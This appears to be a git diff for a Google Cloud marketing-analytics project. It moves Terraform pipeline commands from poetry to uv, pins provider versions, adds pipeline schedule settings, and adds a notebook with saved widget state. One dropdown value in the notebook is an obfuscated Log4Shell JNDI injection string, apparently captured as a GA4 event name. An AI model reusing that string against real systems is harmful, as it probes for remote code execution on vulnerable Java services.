-c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.prediction -i churn_propensity_prediction.yaml EOT working_dir = self.triggers.working_dir } @@ -784,9 +899,9 @@ resource "null_resource" "compile_reporting_preparation_aggregate_predictions_pi # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.reporting_preparation.execution -o reporting_preparation.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f reporting_preparation.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.reporting_preparation.execution -i reporting_preparation.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.reporting_preparation.execution -o reporting_preparation.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f reporting_preparation.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.reporting_preparation.execution -i reporting_preparation.yaml EOT working_dir = self.triggers.working_dir } @@ -805,10 +920,10 @@ resource "null_resource" "compile_gemini_insights_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.gemini_insights.execution -o gemini_insights.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f gemini_insights.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.gemini_insights.execution -i gemini_insights.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.gemini_insights.execution -o gemini_insights.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f gemini_insights.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.gemini_insights.execution -i gemini_insights.yaml EOT working_dir = self.triggers.working_dir } -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/pipelines/variables.tf b/infrastructure/terraform/modules/pipelines/variables.tf index 3afaaed3..3c618cac 100644 --- a/infrastructure/terraform/modules/pipelines/variables.tf +++ b/infrastructure/terraform/modules/pipelines/variables.tf @@ -17,13 +17,8 @@ variable "config_file_path" { description = "pipelines config file" } -variable "poetry_run_alias" { - description = "alias for poetry run command on the current system" - type = string -} - -variable "poetry_installed" { - description = "Construct to specify dependency to poetry installed" +variable "uv_run_alias" { + description = "alias for uv run command on the current system" type = string } diff --git a/infrastructure/terraform/modules/pipelines/versions.tf b/infrastructure/terraform/modules/pipelines/versions.tf index 5a896e28..2e275387 100644 --- a/infrastructure/terraform/modules/pipelines/versions.tf +++ b/infrastructure/terraform/modules/pipelines/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/terraform-sample.tfvars b/infrastructure/terraform/terraform-sample.tfvars index d52b9d0f..dedf5792 100644 --- a/infrastructure/terraform/terraform-sample.tfvars +++ b/infrastructure/terraform/terraform-sample.tfvars @@ -16,10 +16,7 @@ tf_state_project_id = "Google Cloud project where the terraform state file is stored" -create_dev_environment = false -create_staging_environment = false -create_prod_environment = true - +deploy_dataform = true deploy_activation = true deploy_feature_store = true deploy_pipelines = true @@ -28,6 +25,7 @@ deploy_monitoring = true #################### DATA VARIABLES ################################# data_project_id = "Project id where the MDS datasets will be created" +property_id = "Google Analytics 4 property id to identify an unique MDS deployment" destination_data_location = "BigQuery location (either regional or multi-regional) for the MDS BigQuery datasets." data_processing_project_id = "Project id where the Dataform will be installed and run" source_ga4_export_project_id = "Project id which contains the GA4 export dataset" @@ -40,6 +38,170 @@ source_ads_export_data = [ #################### FEATURE STORE VARIABLES ################################# feature_store_project_id = "Project ID where feature store resources will be created" +# These variables are going to become optional with future deployment +# List of comma separated events used in the lead score feature engineering e.g. (["scroll_50", "scroll_90", "view_search_results", ..]) +non_ecomm_events_list = ["scroll_50", "view_search_results"] +# A target event for the lead score propensity feature engineering e.g. "login" +non_ecomm_target_event = "login" + +################### PIPELINE CONFIGURATIONS ################################## + +pipeline_configuration = { + feature-creation-auto-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-purchase-propensity = { + execution = { + schedule = { + state = "ACTIVE" + } + } + } + feature-creation-churn-propensity = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-customer-ltv = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-aggregated-value-based-bidding = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-lead-score-propensity = { + execution = { + schedule = { + state = "ACTIVE" + } + } + } + value_based_bidding = { + training = { + schedule = { + state = "PAUSED" + } + } + explanation = { + schedule = { + state = "PAUSED" + } + } + } + purchase_propensity = { + training = { + schedule = { + state = "ACTIVE" + } + } + prediction = { + schedule = { + state = "ACTIVE" + } + } + } + churn_propensity = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + auto_segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + propensity_clv = { + training = { + schedule = { + state = "PAUSED" + } + } + } + clv = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + lead_score_propensity = { + training = { + schedule = { + state = "ACTIVE" + } + } + prediction = { + schedule = { + state = "ACTIVE" + } + } + } + + gemini_insights = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + reporting_preparation = { + execution = { + schedule = { + state = "PAUSED" + } + } +} #################### ML MODEL VARIABLES ################################# @@ -47,19 +209,19 @@ website_url = "Customer Website URL" # i.e. "https://shop.googlemerchandisestore #################### ACTIVATION VARIABLES ################################# -activation_project_id = "Project ID where activation resources will be created" +activation_project_id = "Project ID where activation resources will be created" #################### GA4 VARIABLES ################################# -ga4_property_id = "Google Analytics property id" -ga4_stream_id = "Google Analytics data stream id" -ga4_measurement_id = "Google Analytics measurement id" -ga4_measurement_secret = "Google Analytics measurement secret" +ga4_property_id = "Google Analytics property id" +ga4_stream_id = "Google Analytics data stream id" +ga4_measurement_id = "Google Analytics measurement id" +ga4_measurement_secret = "Google Analytics measurement secret" #################### GITHUB VARIABLES ################################# -project_owner_email = "Project owner email" -dataform_github_repo = "URL of the GitHub or GitLab repo which contains the Dataform scripts. Should start with https://" +project_owner_email = "Project owner email" +dataform_github_repo = "URL of the GitHub or GitLab repo which contains the Dataform scripts. Should start with https://" # Personal access tokens are intended to access GitHub resources on behalf of yourself. # Generate a github developer token for the repo above following this link: # https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/managing-your-personal-access-tokens#creating-a-personal-access-token-classic diff --git a/infrastructure/terraform/variables.tf b/infrastructure/terraform/variables.tf index 978b6480..38d46a79 100644 --- a/infrastructure/terraform/variables.tf +++ b/infrastructure/terraform/variables.tf @@ -17,6 +17,11 @@ variable "tf_state_project_id" { type = string } +variable "main_project_id" { + type = string + description = "Project ID where feature store resources are created" +} + variable "data_project_id" { description = "Default project to contain the MDS BigQuery datasets" type = string @@ -56,7 +61,7 @@ variable "project_owner_email" { } variable "dataform_github_repo" { - description = "Private Github repo for Dataform." + description = "Private GitHub repo for Dataform." type = string validation { condition = substr(var.dataform_github_repo, 0, 8) == "https://" @@ -65,7 +70,7 @@ variable "dataform_github_repo" { } variable "dataform_github_token" { - description = "Github token for Dataform repo." + description = "GitHub token for Dataform repo." type = string } @@ -81,12 +86,6 @@ variable "pipelines_github_owner" { default = "temporarily unused" } -variable "create_dev_environment" { - description = "Indicates that a development environment needs to be created" - type = bool - default = true -} - variable "dev_data_project_id" { description = "Project ID of where the dev datasets will created. If not provided, data_project_id will be used." type = string @@ -99,12 +98,6 @@ variable "dev_destination_data_location" { default = "" } -variable "create_staging_environment" { - description = "Indicates that a staging environment needs to be created" - type = bool - default = true -} - variable "staging_data_project_id" { description = "Project ID of where the staging datasets will created. If not provided, data_project_id will be used." type = string @@ -117,10 +110,10 @@ variable "staging_destination_data_location" { default = "" } -variable "create_prod_environment" { - description = "Indicates that a production environment needs to be created" - type = bool - default = true +variable "property_id" { + description = "Google Analytics 4 Property ID to install the MDS" + type = string + default = "" } variable "prod_data_project_id" { @@ -147,8 +140,8 @@ variable "source_ga4_export_dataset" { variable "ga4_incremental_processing_days_back" { description = "Past number of days to process GA4 exported data" - type = string - default = "3" + type = string + default = "3" } variable "source_ads_export_data" { @@ -189,6 +182,18 @@ variable "ga4_measurement_secret" { sensitive = true } +variable "deploy_dataform" { + description = "Toggler for activation module" + type = bool + default = false +} + +variable "deploy_purchase_propensity" { + description = "Toggler for purchase propensity module" + type = bool + default = false +} + variable "deploy_activation" { description = "Toggler for activation module" type = bool @@ -219,16 +224,16 @@ variable "mds_dataset_prefix" { default = "marketing_ga4_v1" } -variable "feature_store_config_env" { - description = "determine which config file is used for feature store deployment" +variable "global_config_env" { + description = "determine which config file is used for globaly for deployment" type = string default = "config" } -variable "poetry_cmd" { - description = "alias for poetry run command on the current system" +variable "uv_cmd" { + description = "alias for uv run command on the current system" type = string - default = "poetry" + default = "uv" } variable "feature_store_project_id" { @@ -238,6 +243,199 @@ variable "feature_store_project_id" { variable "website_url" { description = "Website url to be provided to the auto segmentation model" - type = string - default = null + type = string + default = null +} + +variable "time_zone" { + description = "Timezone for scheduled jobs" + type = string + default = "America/New_York" +} + +variable "pipeline_configuration" { + description = "Pipeline configuration that will alternate certain settings in the config.yaml.tftpl" + type = map( + map( + object({ + schedule = object({ + # The `state` defines the state of the pipeline. + # In case you don't want to schedule the pipeline, set the state to `PAUSED`. + state = string + }) + }) + ) + ) + + default = { + feature-creation-auto-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-purchase-propensity = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-churn-propensity = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-customer-ltv = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-aggregated-value-based-bidding = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-lead-score-propensity = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + value_based_bidding = { + training = { + schedule = { + state = "PAUSED" + } + } + explanation = { + schedule = { + state = "PAUSED" + } + } + } + purchase_propensity = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + churn_propensity = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + auto_segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + propensity_clv = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + clv = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + lead_score_propensity = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + } + validation { + condition = alltrue([ + for p in keys(var.pipeline_configuration) : alltrue([ + for c in keys(var.pipeline_configuration[p]) : ( + try(var.pipeline_configuration[p][c].schedule.state, "") == "ACTIVE" || + try(var.pipeline_configuration[p][c].schedule.state, "") == "PAUSED" + ) + ]) + ]) + error_message = "The 'state' field must be either 'PAUSED' or 'ACTIVE' for all pipeline configurations." + } +} + + +variable "non_ecomm_events_list" { + description = "Short list of prioritized events that are correlated to the non ecommerce target event" + type = list(string) + default = ["scroll_50", "view_search_results"] +} + +variable "non_ecomm_target_event" { + description = "Non ecommerce target event for the lead score propensity feature transformation" + type = string + default = "login" } diff --git a/infrastructure/terraform/versions.tf b/infrastructure/terraform/versions.tf index 5a896e28..2e275387 100644 --- a/infrastructure/terraform/versions.tf +++ b/infrastructure/terraform/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/notebooks/events_analysis.ipynb b/notebooks/events_analysis.ipynb new file mode 100644 index 00000000..7800a2c6 --- /dev/null +++ b/notebooks/events_analysis.ipynb @@ -0,0 +1,6786 @@ +{ + "nbformat": 4, + "nbformat_minor": 0, + "metadata": { + "colab": { + "provenance": [] + }, + "kernelspec": { + "name": "python3", + "display_name": "Python 3" + }, + "language_info": { + "name": "python" + }, + "widgets": { + "application/vnd.jupyter.widget-state+json": { + "510a3c2ce1f249c291aeaa8ea214a127": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_dd70738e3b794fff8c79a13d8dedc202", + "IPY_MODEL_b1fc882904974aacaa704e8e1f871227" + ], + "layout": "IPY_MODEL_5240f36b552e48eeb8d3ddcbeaf9f004" + } + }, + "dd70738e3b794fff8c79a13d8dedc202": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DropdownModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DropdownModel", + "_options_labels": [ + "view_search_results", + "view_promotion", + "view_item_list", + "view_item", + "view_cart", + "video_play", + "user_engagement", + "session_start", + "select_promotion", + "select_item", + "scroll", + "remove_from_cart", + "purchase", + "page_view", + "maj_purchase_propensity_vbb_30_15", + "maj_purchase_propensity_30_15", + "maj_cltv_180_30", + "maj_churn_propensity_30_15", + "maj_audience_segmentation_15", + "imported", + "first_visit", + "errors", + "click", + "begin_checkout", + "ads_conversion_Checkout_1", + "add_to_wishlist", + "add_to_cart", + "add_shipping_info", + "add_payment_info", + "${jndi:dns://33${::-.}post${::-.}analyti" + ], + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "DropdownView", + "description": "Target:", + "description_tooltip": null, + "disabled": false, + "index": 12, + "layout": "IPY_MODEL_f25457004bb5499aa7301831d9337ab7", + "style": "IPY_MODEL_7bea3caf6e954ec4850290f791b790db" + } + }, + "b1fc882904974aacaa704e8e1f871227": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ButtonView", + "button_style": "", + "description": "Confirm Target", + "disabled": false, + "icon": "", + "layout": "IPY_MODEL_b55f0d2197ef4068979e6ac7613658c1", + "style": "IPY_MODEL_c5fb7e585532423f85122c3e4d118bea", + "tooltip": "" + } + }, + "5240f36b552e48eeb8d3ddcbeaf9f004": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "f25457004bb5499aa7301831d9337ab7": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "7bea3caf6e954ec4850290f791b790db": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "b55f0d2197ef4068979e6ac7613658c1": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "c5fb7e585532423f85122c3e4d118bea": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "button_color": null, + "font_weight": "" + } + }, + "a7e3ea48a523462daeac82d4f5640101": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_dd70738e3b794fff8c79a13d8dedc202", + "IPY_MODEL_b1fc882904974aacaa704e8e1f871227" + ], + "layout": "IPY_MODEL_bc83fabc3fd04f66aa62826ac7014f1f" + } + }, + "bc83fabc3fd04f66aa62826ac7014f1f": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "dabe307bb3814c0b928f4e6afe5e8bc8": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ButtonView", + "button_style": "", + "description": "Confirm Features", + "disabled": false, + "icon": "", + "layout": "IPY_MODEL_c2b1c7eb19aa431ab36f63e725062225", + "style": "IPY_MODEL_becaf358ea92408781b9fed526032216", + "tooltip": "" + } + }, + "c2b1c7eb19aa431ab36f63e725062225": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "becaf358ea92408781b9fed526032216": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "button_color": null, + "font_weight": "" + } + }, + "cb59e53ee06f4cdcba6970997af52a0d": { + "model_module": "@jupyter-widgets/controls", + "model_name": "GridBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "GridBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "GridBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_435c30134cab4d30b02115b45315c96f", + "IPY_MODEL_cb90e799babe4000a2385a42835715dc", + "IPY_MODEL_4dab22eea30f4879b69c42957bee96dc", + "IPY_MODEL_158f1d53adf54c528eb0c290c1bf38a7", + "IPY_MODEL_0cebc5f02aed4a96a4bc46a1123e83f2", + "IPY_MODEL_069ad5938cc44d1b98c0b715c120e2fb", + "IPY_MODEL_29490473f86c4224b40f1bc14dcf4126", + "IPY_MODEL_d76a2a87928a4feaa388e906e3dba5c0", + "IPY_MODEL_f106dfaad61d4048a9dee141dbfc70f8", + "IPY_MODEL_27093f0b59604748b47e1011ade33069", + "IPY_MODEL_b98edc06317d4ba68678baade932be80", + "IPY_MODEL_7506fba59d244542a9f950d865375a7f", + "IPY_MODEL_0860bfa9645f406e81b47285a8c5ea94", + "IPY_MODEL_7e36b5eab7b74d2fac02312aec136228", + "IPY_MODEL_b18c8b6f127241458d6304b8e43d0b40", + "IPY_MODEL_377fb1783fae4079a4406df02b6a2840", + "IPY_MODEL_09d4235a91e34e84b8b773cebc19a854", + "IPY_MODEL_cd912a4adae54ba8a2c32dc01402c523", + "IPY_MODEL_81fdbc9e894a4ba39f19eea43a6935f2", + "IPY_MODEL_72eebc41731d4dafbd2a4528032bdf11", + "IPY_MODEL_ce94c729917848e8b98b965163e4466b", + "IPY_MODEL_16031519618548678483de6e12dd3245", + "IPY_MODEL_09fce7da46184625a657e076f89ffbad", + "IPY_MODEL_fe4d60abead4406dbac0e54e6384f787", + "IPY_MODEL_fb03611950c8499a9078544ba5eeefa3", + "IPY_MODEL_d1d9f57fa9fa42d797325eed00664ed8", + "IPY_MODEL_2ff572bb94534bae8dfa5b61bb36adfd", + "IPY_MODEL_903f3582fe194b61b062f6575cadf380", + "IPY_MODEL_4da6287f1f5140228c1cbbe3e9873ea0" + ], + "layout": "IPY_MODEL_fc2e0535ede24be5a2b28ff37b307475" + } + }, + "435c30134cab4d30b02115b45315c96f": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "view_search_results", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_50a2eed8e87a4b3fbe4f7a31d5c54a5c", + "style": "IPY_MODEL_28580af1f9e54bbe99dd7ef9b3e1c7c0", + "value": false + } + }, + "cb90e799babe4000a2385a42835715dc": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "view_promotion", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_f2e199b4f49d4beda16da275bad92312", + "style": "IPY_MODEL_2280d04b76b34456a3e0ebb257cbb58d", + "value": false + } + }, + "4dab22eea30f4879b69c42957bee96dc": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "view_item_list", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_9e14f8ccc46a415382508d2f398801b1", + "style": "IPY_MODEL_6cc57addbbe3499fae8d82188d6cc466", + "value": false + } + }, + "158f1d53adf54c528eb0c290c1bf38a7": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "view_item", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_2a36fd87b7e048ab80b41250b2444cff", + "style": "IPY_MODEL_6f80b1fdc1a645dda301f305c3fcfa3c", + "value": false + } + }, + "0cebc5f02aed4a96a4bc46a1123e83f2": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "view_cart", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_d5d5d1041afb49fba74e2010a8b517ef", + "style": "IPY_MODEL_df4a6c1954694ebd9078d2bbce331c0c", + "value": true + } + }, + 